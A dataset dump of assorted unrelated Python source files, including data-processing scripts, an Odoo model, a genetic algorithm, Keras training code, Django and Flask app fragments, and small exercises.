6000000\r\n\r\nPIN_FILE = \"pins/%s.pins\"\r\nPIN_FILE_BACKUP = \"pins/%s.bak\"\r\n\r\nBOARD_CATEGORIES = [\"animals\", \"architecture\", \"art\", \"cars_motorcycles\", \r\n \"celebrities\", \"design\", \"diy_crafts\", \"education\", \r\n \"film_music_books\", \"food_drink\", \"gardening\", \"geek\", \r\n \"hair_beauty\", \"health_fitness\", \"history\", \"holidays_events\", \r\n \"home_decor\", \"humor\", \"illustrations_posters\", \"kids\", \r\n \"mens_fashion\", \"outdoors\", \"photography\", \"products\", \r\n \"quotes\", \"science_nature\", \"sports\", \"tattoos\", \"technology\", \r\n \"travel\", \"weddings\", \"womens_fashion\"]\r\n\r\ndef count_pins(category):\r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n return len(pins)\r\n\r\ndef count_unique_pins(category):\r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n return len(set(pins))\r\n\r\ndef truncate_pin_files(category):\r\n shutil.copy2(PIN_FILE % category, PIN_FILE_BACKUP % category)\r\n \r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n \r\n pin_file = open(PIN_FILE % category, \"w\")\r\n pin_file.writelines(list(set(pins))[:min(PIN_COUNT, len(pins))])\r\n pin_file.close()\r\n \r\nif __name__ == \"__main__\":\r\n for category in BOARD_CATEGORIES[27:]: # last = science_nature\r\n truncate_pin_files(category)\r\n print(\"%s\\t\\t%d\" % (category, count_unique_pins(category)))","sub_path":"src/ca/utoronto/pinterest/data/python/pin_data_processor.py","file_name":"pin_data_processor.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156642228","text":"str_a=input(\"What is the first number? \")\nstr_b=input(\"What is the second number? 
\")\n\na=float(str_a)\nb=float(str_b)\n\nprint(\n\"\"\"\n{is_a} + {is_b} = {plus}\n{is_a} - {is_b} = {minus}\n{is_a} * {is_b} = {mulitply}\n{is_a} / {is_b} = {divide}\n\"\"\"\n.format(is_a=a, is_b=b, plus=a+b, minus=a-b, mulitply=a*b, divide=a/b)\n )\n\n","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475472265","text":"# encoding: utf-8\n\"\"\"\n机器服务器逻辑日志ETL。\n作用是读取然后按照日期和接口合并到一天,用于数据验证。因为目前日志里面的日期是收集日期。\n@author Yuriseus\n@create 16-11-17 下午4:34\n\"\"\"\nimport json\nimport os\n\nfrom service.minik_server.active_user import ActiveUserService\nfrom service.minik_server.consume import ConsumeService\nfrom service.minik_server.game_session import GameSessionService\nfrom service.minik_server.show_user_info import ShowUserInfoService\nfrom service.minik_server.song_play import SongPlayService\nfrom util.date import DateUtil\n\n\nclass MinikServerInterfaceETL(object):\n def __init__(self):\n super(MinikServerInterfaceETL, self).__init__()\n self.files = {}\n\n def process_start(self, date):\n \"\"\"\n 开始处理\n :param date: yyyy-mm-dd\n :return:\n \"\"\"\n year = date[0:4]\n source_path = '/data/disk1/logdata/minik_server/logic/%s/%s.log' % (year, date)\n self.process_file(source_path)\n\n def process_file(self, file_path):\n with open(file_path) as f:\n for line in f:\n d = self.split(line)\n if self.filter(d):\n self.process_after_clean(d)\n self.process_end()\n\n def split(self, line):\n d = {}\n line = line.replace('\\n', '')\n tmp = line.split('&')\n d['timestamp'] = tmp[0]\n d['mid'] = tmp[1]\n d['interface'] = tmp[2]\n try:\n # 因为有异常情况导致解析的日志中的格式是错误的\n d['data'] = json.loads(tmp[3]) # 字典\n except Exception:\n d['data'] = None\n d['exec_version'] = tmp[4] # 程序版本\n d['ui_version'] = tmp[5] # UI版本\n return d\n\n def filter(self, d):\n data = d['data']\n if data:\n return True\n return False\n\n def process_after_clean(self, d):\n interface = d['interface']\n data = self.get_clean_data(d, interface)\n\n if data:\n # 数据必须包含时间戳\n timestamp = int(data['timestamp'])\n if timestamp >= 1451577600: # 2016-01-01 00:00:00\n date = DateUtil.timestamp2date(timestamp, '%Y-%m-%d')\n year = date[0:4]\n data = str(data).replace(\"u'\", '\"') # 标准json是双引号的\n data = data.replace(\"'\", '\"')\n # 目录不存在需要创建\n base_dir = '/data/disk1/clean_data/minik_server/logic/%(year)s/%(date)s/' % {'year': year, 'date': date}\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n\n # 每个接口一个文件\n interface_file_path = base_dir + '%(interface)s.log' % {'interface': interface}\n if interface_file_path not in self.files:\n target_file = open(interface_file_path, 'a+')\n self.files[interface_file_path] = target_file\n\n target_file = self.files[interface_file_path]\n target_file.write('%s\\n' % data)\n\n def get_clean_data(self, d, interface):\n \"\"\"\n 获取清洗后的数据。\n :param d:\n :param interface:\n :return: dict 必须包含时间戳timestamp\n \"\"\"\n data = None\n\n if interface == 'connector.entryHandler.macPlayingModeGameOverV2':\n service = GameSessionService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'connector.playerHandler.playerFinishSong':\n service = SongPlayService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'onWebxinLogin':\n service = ActiveUserService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'onShowUserInfo':\n service = ShowUserInfoService()\n if service.filter(d):\n data = 
service.process_data(d)\n elif interface == 'connector.entryHandler.accountRecordInfo':\n service = ConsumeService()\n if service.filter(d):\n data = service.process_data(d)\n else:\n if self.filter(d):\n data = d['data']\n data['timestamp'] = d['timestamp']\n return data\n\n def process_end(self):\n \"\"\"\n 处理结束,关闭所有打��的文件\n :return:\n \"\"\"\n for file_path, file_handler in self.files.items():\n file_handler.close()\n\n\n\n\n","sub_path":"DataCompute/python/etl/minik_server_interface.py","file_name":"minik_server_interface.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"374352076","text":"import copy\nfrom PyQt5.QtCore import QThread, pyqtSignal\nimport numpy as np\n\nCARGA = 20\n\nclass Individuo:\n def __init__(self, alelos, longitud_gen, cromosoma):\n self._alelos = alelos\n self._longitud_gen = longitud_gen\n self._cromosoma = cromosoma\n self._fitness = 0\n\nclass AGB(QThread):\n countChanged = pyqtSignal(int)\n def __init__(self, cantidad_individuos, alelos, tamano_gen, generaciones, p, problema):\n super(QThread, self).__init__()\n self._cantidad_individuos = cantidad_individuos\n self._alelos = alelos\n self._tamano_gen = tamano_gen\n self._generaciones = generaciones\n self._p = p\n self._problema = problema\n self._individuos = np.array([])\n self._historicos = []\n self.historicos = []\n self._generacion = 0\n\n def run(self):\n self.optimizar()\n\n def optimizar(self):\n self.crearIndividuos()\n self._mejor_historico = self._individuos[0]\n self._generacion = 0\n progreso = 100 / self._generaciones\n progreso_cont = 0\n while self._generacion < self._generaciones:\n self.evaluaIndividuos()\n hijos = np.array([])\n while len(hijos) < len(self._individuos):\n padre1 = self.ruleta()\n padre2 = self.ruleta()\n while padre1 == padre2:\n padre2 = self.ruleta()\n h1, h2 = self.cruza(self._individuos[padre1], self._individuos[padre2])\n hijos = np.append(hijos, [h1])\n hijos = np.append(hijos, [h2])\n self.mutacion(hijos)\n self._individuos = np.copy(hijos)\n self._individuos[np.random.randint(len(self._individuos))] = copy.deepcopy(self._mejor_historico)\n \n # print(\"Generación: \", self._generacion, 'Mejor Histórico: ', self._mejor_historico._cromosoma, self._mejor_historico._fitness)\n self.historicos.append(self._mejor_historico._fitness)\n\n self._generacion += 1\n progreso_cont += progreso\n if int(progreso_cont) % 5:\n self.countChanged.emit(progreso_cont)\n\n def crearIndividuos(self):\n for _ in range(self._cantidad_individuos):\n cromosoma = np.random.randint(2, size = self._alelos)\n individuo = Individuo(self._alelos, self._tamano_gen, cromosoma)\n self._individuos = np.append(self._individuos, [individuo])\n\n def evaluaIndividuos(self):\n for i in self._individuos:\n i._fitness = self._problema.f(i._cromosoma)\n if i._fitness > self._mejor_historico._fitness:\n self._mejor_historico = copy.deepcopy(i)\n self._historicos.append([i._cromosoma,i._fitness, self._generacion])\n\n def ruleta(self):\n f_sum = np.sum([i._fitness for i in self._individuos])\n if f_sum == 0:\n return np.random.randint(len(self._individuos))\n else:\n r = np.random.randint(f_sum + 1)\n k = 0\n F = self._individuos[k]._fitness\n while F < r:\n k += 1\n F += self._individuos[k]._fitness\n return k\n\n def cruza(self, i1, i2):\n h1 = copy.deepcopy(i1)\n h2 = copy.deepcopy(i2)\n\n s = self._alelos - 1\n punto_cruza = np.random.randint(s) + 1\n for i in range(punto_cruza, self._alelos):\n 
h1._cromosoma[i], h2._cromosoma[i] = h2._cromosoma[i], h1._cromosoma[i]\n return h1, h2\n\n def mutacion(self, hijos):\n for h in hijos:\n for bit in range(len(h._cromosoma)):\n if np.random.rand() < self._p:\n h._cromosoma[bit] = int(not h._cromosoma[bit])\n","sub_path":"codigoFuente/Algorithms/AGB.py","file_name":"AGB.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496068500","text":"\"\"\"\njut config command\n\n\"\"\"\n\nfrom jut import config\n\nfrom jut.api import auth, authorizations, deployments\nfrom jut.common import info\nfrom jut.exceptions import JutException\nfrom jut.util.console import prompt\n\n\ndef default_deployment(app_url, client_id, client_secret):\n \"\"\"\n \"\"\"\n if app_url.strip() == '':\n app_url = 'https://app.jut.io'\n\n token_manager = auth.TokenManager(client_id=client_id,\n client_secret=client_secret,\n app_url=app_url)\n\n user_deployments = deployments.get_deployments(token_manager=token_manager,\n app_url=app_url)\n\n if len(user_deployments) > 1:\n index = 0\n for deployment in user_deployments:\n info(' %d: %s', index + 1, deployment['name'])\n index += 1\n\n which = prompt('Pick default deployment from above: ')\n\n return user_deployments[int(which)-1]['name']\n else:\n return user_deployments[0]['name']\n\n\ndef default_configuration(interactive=True):\n if config.length() == 1:\n # when there is only one configuration, that should be the default one\n config.set_default(index=1)\n\n else:\n if interactive:\n info('Pick a default configuration from the list below')\n config.show()\n which = prompt('Set default configuration to: ')\n config.set_default(index=int(which))\n configuration = config.get_default()\n\n default_deployment(configuration['app_url'],\n configuration['client_id'],\n configuration['client_secret'])\n\n\ndef add_configuration(options):\n \"\"\"\n interactively add a new configuration\n\n \"\"\"\n if options.username != None:\n username = options.username\n else:\n username = prompt('Username: ')\n\n if options.password != None:\n password = options.password\n else:\n password = prompt('Password: ', hide_input=not options.show_password)\n\n if options.app_url != None:\n app_url = options.app_url\n else:\n app_url = prompt('App URL (default: https://app.jut.io just hit enter): ')\n\n if app_url.strip() == '':\n app_url = 'https://app.jut.io'\n\n section = '%s@%s' % (username, app_url)\n\n if config.exists(section):\n raise JutException('Configuration for \"%s\" already exists' % section)\n\n token_manager = auth.TokenManager(username=username,\n password=password,\n app_url=app_url)\n\n authorization = authorizations.get_authorization(token_manager,\n app_url=app_url)\n client_id = authorization['client_id']\n client_secret = authorization['client_secret']\n\n deployment_name = default_deployment(app_url,\n client_id,\n client_secret)\n\n config.add(section, **{\n 'app_url': app_url,\n 'deployment_name': deployment_name,\n 'username': username,\n 'client_id': client_id,\n 'client_secret': client_secret\n })\n\n if options.default:\n config.set_default(name=section)\n else:\n default_configuration(interactive=False)\n\n\ndef rm_configuration(options):\n was_default = False\n\n if options.username != None:\n configuration = '%s@%s' % (options.username, options.app_url)\n was_default = config.is_default(name=configuration)\n config.remove(name=configuration)\n\n else:\n config.show()\n which = prompt('Which configuration to remove: 
')\n which = int(which)\n was_default = config.is_default(index=which)\n config.remove(index=which)\n\n if was_default:\n default_configuration()\n\n\ndef change_defaults(options):\n if options.username != None:\n configuration = '%s@%s' % (options.username, options.app_url)\n config.set_default(name=configuration)\n configuration = config.get_default()\n\n else:\n config.show()\n which = prompt('Set default configuration to: ')\n config.set_default(index=int(which))\n configuration = config.get_default()\n\n default_deployment(configuration['app_url'],\n configuration['client_id'],\n configuration['client_secret'])\n\n","sub_path":"jut/commands/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"514425191","text":"def is_safe(maze, x, y, r, c):\r\n if 0 < x <= r and 0 < y <= c and maze[x][y] == 0:\r\n return True\r\n return False\r\n\r\n\r\ndef solve(maze, x, y, r, c):\r\n global count\r\n if x == r and y == c:\r\n count += 1\r\n return\r\n if is_safe(maze, x + 1, y, r, c):\r\n solve(maze, x + 1, y, r, c)\r\n if is_safe(maze, x, y + 1, r, c):\r\n solve(maze, x, y + 1, r, c)\r\n\r\n\r\nr, c = input().split()\r\n\r\ncount = 0\r\n\r\nmaze = [[0 for i in range(int(c) + 1)] for j in range(int(r) + 1)]\r\n\r\nk = int(input())\r\nfor i in range(k):\r\n a, b = input().split()\r\n maze[int(a)][int(b)] = 1\r\n\r\n\r\nsolve(maze, 1, 1, int(r), int(c))\r\nprint(count)","sub_path":"2012 Contest/Problem S5.py","file_name":"Problem S5.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220411518","text":"from game.guesser import Guesser\nfrom game.word import Word\nfrom game.parachute import Parachute\n\n\nclass Director:\n \"\"\"A code template for a person who directs the game. 
The responsibility of \n    this class of objects is to keep track of the score and control the \n    sequence of play.\n    \n    Attributes:\n        keep_playing (boolean): Whether or not the player wants to keep playing.\n        parachute: Will take care of the graphics.\n        guesser: User guesses the secret word by inputting a letter.\n        words: Will take care of getting a random word and responding to user inputs.\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"The class constructor.\n        \n        Args:\n            self (Director): an instance of Director.\n        \"\"\"\n        self.word = Word()\n        self.parachute = Parachute()\n        self.guesser = Guesser() \n        self.keep_playing = True \n\n    def start_game(self):\n        \"\"\"Starts the game loop to control the sequence of play.\n        \n        Args:\n            self (Director): an instance of Director.\n        \"\"\"\n        self.do_outputs()\n        \n        while self.keep_playing:\n            self.get_inputs()\n            self.do_outputs()\n\n    def do_outputs(self):\n        print(self.word.secret_word())\n        print(self.parachute.parachuter())\n        \n        self.keep_playing = not self.parachute.end() or self.word.see_blank()\n\n    def get_inputs(self):\n        user_guess = self.guesser.get_user_guess(\"Guess a letter [a-z]: \")\n        \n        while self.word.verify_letter(user_guess) == False:\n            print(\"Please enter a different letter.\")\n            user_guess = self.guesser.get_user_guess(\"Guess a letter [a-z]: \")\n        \n        if self.word.letter_in_list(user_guess) == False:\n            self.parachute.guessed_wrong()","sub_path":"jumper/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"561864502","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nimport datetime\n\nclass PersonalDetails(models.Model):\n    _inherit = 'res.partner'\n    _description = \"force member's personal details for ribbon_bk, medal, cap, belt, ranks etc\"\n    is_force=fields.Boolean(\"Is a Force\",default=False , translate=True)\n    force_id = fields.Many2one(\"ribbon_bk.force\",\"Force\")\n    id_no=fields.Char(\"ID No\")\n    rank = fields.Many2one(\"ribbon_bk.rank\",\"Rank\",translate=True)\n    unit=fields.Many2one(\"ribbon_bk.force.unit\",string=\"Unit\",translate=True ,domain=\"[('force_name','=',force_id)]\")\n    post=fields.Many2one(\"ribbon_bk.post\",string=\"Post\",translate=True)\n    joining=fields.Date(\"Joining Date\")\n    bcs=fields.Boolean(\"BCS ?\")\n    retired=fields.Date(\"Retired Date\")\n    service_year=fields.Integer(\"Service Year\")\n    service_month=fields.Integer(\"Service Month\")\n    service_day=fields.Integer(\"Service Day\")\n    service_length=fields.Char(\"Service Length\",compute=\"calculate_service_length\")\n    cap=fields.Char(\"Cap\")\n    belt=fields.Char(\"Belt\")\n    name_tag_eng=fields.Char(\"Name Tag\")\n    name_tag_bn=fields.Char(\"নাম ফলক\")\n    note=fields.Char(\"note\")\n    conf_note=fields.Char(\"confidential\")\n    freedom_f=fields.Boolean(\"Freedom Fighter\")\n    nirapotta=fields.Boolean(\"Nirapotta\")\n    bpa=fields.Boolean(\"Police Academy\")\n    psc=fields.Boolean(\"Staff College\")\n    rab=fields.Boolean(\"RAB\")\n    missions=fields.One2many(\"ribbon_bk.personal.mission\",'partner_id')\n    services=fields.One2many(\"ribbon_bk.personal.service\",'partner_id')\n    awards=fields.One2many(\"ribbon_bk.personal.award\",'partner_id')\n\n    @api.onchange('joining',\"retired\")\n    def calculate_service_length(self):\n        currentDate=datetime.datetime.now()\n        for rec in self:\n            if rec.joining:\n                if rec.retired:\n                    curYear=rec.retired.year\n                    curMonth=rec.retired.month\n                    curDay=rec.retired.day\n                else:\n                    curYear = currentDate.year\n                    
curMonth = currentDate.month\n curDay = currentDate.day\n\n lyear=rec.joining.year\n lmonth=rec.joining.month\n lday=rec.joining.day\n lday=curDay-lday\n lmonth=curMonth-lmonth\n lyear=curYear-lyear\n length_string=\"\"\n if lday<0:\n lday=lday+30\n lmonth=lmonth-1\n if lmonth<0:\n lmonth=lmonth+12\n lyear=lyear-1\n if lyear>0:\n length_string=length_string+ str(lyear) +\" Year \"\n if lmonth>0:\n length_string=length_string+ str(lmonth) + \" Month \"\n if lday>0:\n length_string=length_string+ str(lday) + \" Day \"\n rec.service_length=length_string\n rec.service_year=lyear\n rec.service_month=lmonth\n rec.service_day=lday\n\nclass RibbonMedalPersonalacquisition(models.Model):\n _name=\"ribbon_bk.personal.acquisition\"\n _description=\"list of Personal Acquisition\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalAward(models.Model):\n _name=\"ribbon_bk.personal.award\"\n _description=\"list of Personal Award\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalMission(models.Model):\n _name=\"ribbon_bk.personal.mission\"\n _description=\"list of Personal Mission\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalservice(models.Model):\n _name=\"ribbon_bk.personal.service\"\n _description=\"list of Personal service\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")","sub_path":"ribbon_bk/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"192265872","text":"import argparse\nimport os\nfrom datetime import datetime\nimport keras\nfrom keras.backend import set_session\nfrom keras.callbacks import LearningRateScheduler, TensorBoard, CSVLogger, ModelCheckpoint\nfrom keras.optimizers import SGD\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom resnet import ResnetBuilder\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n if v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\ny_train = keras.utils.to_categorical(y_train, num_classes=10)\ny_test = keras.utils.to_categorical(y_test, num_classes=10)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-ly\", type=int, default=14)\nparser.add_argument(\"-wd\", type=float, default=1e-4)\nparser.add_argument(\"-bn\", type=str2bool, default=False)\nparser.add_argument(\"-ep\", type=int, default=100)\nparser.add_argument(\"-bs\", type=int, default=128)\nparser.add_argument(\"-shift\", type=float, default=0.125)\nparser.add_argument(\"-gpu\", type=str, default='1')\nparser.add_argument(\"-mem\", type=float, default=0.25)\nparams = parser.parse_args()\n\n# gpu setting\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = 
'3'\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = params.gpu\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = params.mem\nset_session(tf.Session(config=config))\n\n\nmodel = ResnetBuilder.build_resnet_cifar10(params.ly, use_bn=params.bn)\nsgd = SGD(momentum=0.9)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\ndir_name = \"e\" + datetime.now().strftime(\"%m%d-%H-%M-%S\") + \\\n           \"l\" + str(params.ly) + \\\n           \"_ing\"\ncsv_logger = CSVLogger(os.path.join(dir_name, 'log.csv'))\nlr_scheduler = LearningRateScheduler(lambda x: 0.05 if x < 60 else 0.03 if x < 80 else 0.005)\nboard = TensorBoard(log_dir=dir_name, histogram_freq=0, write_graph=False, write_images=False)\nchecker = ModelCheckpoint(filepath=os.path.join(dir_name, \"weights.{epoch:02d}-{val_loss:.2f}.hdf5\"), period=20)\nif not os.path.exists(dir_name): os.mkdir(dir_name)\nwith open(os.path.join(dir_name, 'config'), 'w') as wf:\n    wf.write(\"-----\" + str(params) + dir_name)\ncallbacks = [lr_scheduler, csv_logger, board, checker]\ndatagen_train = ImageDataGenerator(\n    width_shift_range=params.shift,\n    height_shift_range=params.shift,\n)\ndatagen_test = ImageDataGenerator()\nmodel.fit_generator(datagen_train.flow(x_train, y_train, batch_size=params.bs),\n                    steps_per_epoch=x_train.shape[0] / params.bs,\n                    validation_data=datagen_test.flow(x_test, y_test, batch_size=params.bs),\n                    validation_steps=x_test.shape[0] / params.bs,\n                    epochs=params.ep,\n                    max_q_size=2500,\n                    workers=10,\n                    callbacks=callbacks)\nlosses = model.evaluate(x_test, y_test, batch_size=params.bs)\nprint(losses)\nwith open(os.path.join(dir_name, 'config'), 'a') as wf:\n    wf.write(str(losses) + '\\n')\nos.rename(dir_name, dir_name.replace('_ing', '_fin'))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465719404","text":"from datetime import date\n\nfrom django.test import TestCase\n\nfrom robber import expect\n\nfrom officers.indexers import RankChangeNewTimelineEventIndexer\nfrom data.factories import SalaryFactory, OfficerFactory, OfficerHistoryFactory\n\n\nclass RankChangeNewTimelineEventIndexerTestCase(TestCase):\n    def extract_data(self):\n        indexer = RankChangeNewTimelineEventIndexer()\n        return [indexer.extract_datum(obj) for obj in indexer.get_queryset()]\n\n    def test_extract_datum(self):\n        officer1 = OfficerFactory(id=123)\n        officer2 = OfficerFactory(id=456)\n        OfficerHistoryFactory(\n            officer=officer1,\n            effective_date=date(2006, 1, 1),\n            unit__unit_name='001',\n            unit__description='District 1')\n        OfficerHistoryFactory(\n            officer=officer1,\n            effective_date=date(2008, 1, 1),\n            unit__unit_name='002',\n            unit__description='District 2')\n        OfficerHistoryFactory(\n            officer=officer2,\n            effective_date=date(2004, 1, 1),\n            unit__unit_name='003',\n            unit__description='District 3')\n        SalaryFactory(\n            officer=officer1, salary=5000, year=2005, rank='Police Officer', spp_date=date(2005, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n        SalaryFactory(\n            officer=officer1, salary=10000, year=2006, rank='Police Officer', spp_date=date(2005, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n        SalaryFactory(\n            officer=officer1, salary=15000, year=2007, rank='Sergeant', spp_date=date(2007, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n        SalaryFactory(\n            officer=officer2, salary=5000, year=2005, rank='Police Officer', spp_date=date(2005, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n        
SalaryFactory(\n            officer=officer2, salary=15000, year=2006, rank='Detective', spp_date=date(2006, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n        SalaryFactory(\n            officer=officer2, salary=20000, year=2007, rank='Detective', spp_date=date(2006, 1, 1),\n            start_date=date(2005, 1, 1)\n        )\n\n        rows = self.extract_data()\n        expect(rows).to.have.length(4)\n        expect(rows).to.eq([\n            {\n                'officer_id': 123,\n                'date_sort': date(2005, 1, 1),\n                'priority_sort': 25,\n                'date': '2005-01-01',\n                'kind': 'RANK_CHANGE',\n                'unit_name': '',\n                'unit_description': '',\n                'rank': 'Police Officer',\n            },\n            {\n                'officer_id': 123,\n                'date_sort': date(2007, 1, 1),\n                'priority_sort': 25,\n                'date': '2007-01-01',\n                'kind': 'RANK_CHANGE',\n                'unit_name': '001',\n                'unit_description': 'District 1',\n                'rank': 'Sergeant',\n            },\n            {\n                'officer_id': 456,\n                'date_sort': date(2005, 1, 1),\n                'priority_sort': 25,\n                'date': '2005-01-01',\n                'kind': 'RANK_CHANGE',\n                'unit_name': '003',\n                'unit_description': 'District 3',\n                'rank': 'Police Officer',\n            },\n            {\n                'officer_id': 456,\n                'date_sort': date(2006, 1, 1),\n                'priority_sort': 25,\n                'date': '2006-01-01',\n                'kind': 'RANK_CHANGE',\n                'unit_name': '003',\n                'unit_description': 'District 3',\n                'rank': 'Detective',\n            }\n        ])\n","sub_path":"cpdb/officers/tests/indexers/test_rank_change_new_timeline_event_indexer.py","file_name":"test_rank_change_new_timeline_event_indexer.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172125704","text":"from os import listdir\nfrom os.path import isfile, join\nimport re\nimport string\n\nallmethod = (\n    'checkout',\n    'copy',\n    'delete',\n    'get',\n    'head',\n    'lock',\n    'merge',\n    'mkactivity',\n    'mkcol',\n    'move',\n    'm-search',\n    'notify',\n    'options',\n    'patch',\n    'post',\n    'purge',\n    'put',\n    'report',\n    'search',\n    'subscribe',\n    'trace',\n    'unlock',\n    'unsubscribe'\n)\n\npunctuations = string.punctuation.replace('_', '')\n\n\ndef getFunction(path):\n    function_lists = []\n    method_lists = []\n    redux_names = []\n    for filename in listdir(path):\n        if filename == '.DS_Store':\n            continue  # skip the macOS metadata file\n\n        function_list = []\n        method_list = []\n\n        if re.search(r'\\bcontroller\\b', filename, re.I):\n            remove_controller = filename.replace(re.search(r'\\bcontroller\\b', filename, re.I).group(), '')\n            remove_js = remove_controller.replace('js', '')\n            remove_dot = remove_js.replace('.', '')\n            redux_names.append(remove_dot)\n\n            with open(path + '/' + filename) as controls:\n                lines = controls.readlines()\n                routes = [l for l in lines if l[:6] == 'router']\n                for r in routes:\n                    r = r.strip()\n                    for m in allmethod:\n                        if re.search(r\"\\b%s\\b\" % m, r, re.I):\n                            method_list.append(re.search(r\"\\b%s\\b\" % m, r, re.I).group())\n                    segments = r.split(',')\n                    function_name = segments[-1].translate(str.maketrans('', '', punctuations)).strip()\n                    function_list.append(function_name)\n                function_lists.append(function_list)\n                method_lists.append(method_list)\n                function_list = []\n                method_list = []\n    return redux_names, function_lists, method_lists\n\n\nif __name__ == \"__main__\":\n    print(getFunction('service'))\n","sub_path":"controller_reader.py","file_name":"controller_reader.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"549556033","text":"# @Time : 2020/6/21 18:57\n# @Author : Chenguangfu\n# @Site : \n# @File : urls.py\n# @Software: PyCharm\n\nfrom django.urls import path\nfrom . 
import views\n\napp_name = 'polls'\n\nurlpatterns = [\n    # ex: /polls/\n    path('', views.index, name='index'),\n\n    # ex: /polls/5/\n    # route with the specifics prefix added\n    # path('specifics/<int:question_id>/', views.detail, name='detail'),\n    # the line above is commented out; replaced with the pattern with an explicit converter\n    path('<int:question_id>/', views.detail, name='detail'),\n\n    # ex: /polls/5/results/\n    path('<int:question_id>/results/', views.results, name='results'),\n\n    # ex: /polls/5/vote/\n    path('<int:question_id>/vote/', views.vote, name='vote'),\n\n]","sub_path":"mysite/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220596079","text":"#!/usr/bin/env python3\n\nimport logging, os\nimport logging.handlers\n\nfrom flask import (Flask, has_request_context, redirect, render_template,\n                   url_for, request)\n\nimport db, db_funcs, mail, polls, search\n\napp = Flask(__name__, instance_relative_config=True)\n\nclass DefaultConfig:\n    SECRET_KEY=\"placeholder_key\"\n    DATABASE=os.path.join(app.instance_path, \"stickpoll.sqlite\")\n    TEMPLATES_AUTO_RELOAD=True\n    ALLOW_REPEAT_VOTES=False\n    SENDGRID_API_KEY=\"placeholder_key\"\n    SENDGRID_DEFAULT_FROM=\"noreply@stickpoll.com\"\n    UPDATE_INTERVAL=60\n\napp.config.from_object(DefaultConfig)\napp.config.from_pyfile(\"config.cfg\", silent=True)\n\ntry:\n    os.makedirs(app.instance_path)\nexcept OSError:\n    pass\n\nclass RequestFormatter(logging.Formatter):\n    def format(self, record):\n        if has_request_context():\n            record.url = request.url\n            record.remote_addr = request.remote_addr\n        else:\n            record.url = None\n            record.remote_addr = None\n        return super().format(record)\n\nif not app.config[\"DEBUG\"] or True:\n    try:\n        os.makedirs(os.path.join(app.instance_path, \"logs\"))\n    except OSError:\n        pass\n    file_handler = logging.handlers.RotatingFileHandler(\n        os.path.join(app.instance_path, \"logs\", \"stickpoll.log\"),\n        maxBytes=10240,\n        backupCount=10)\n    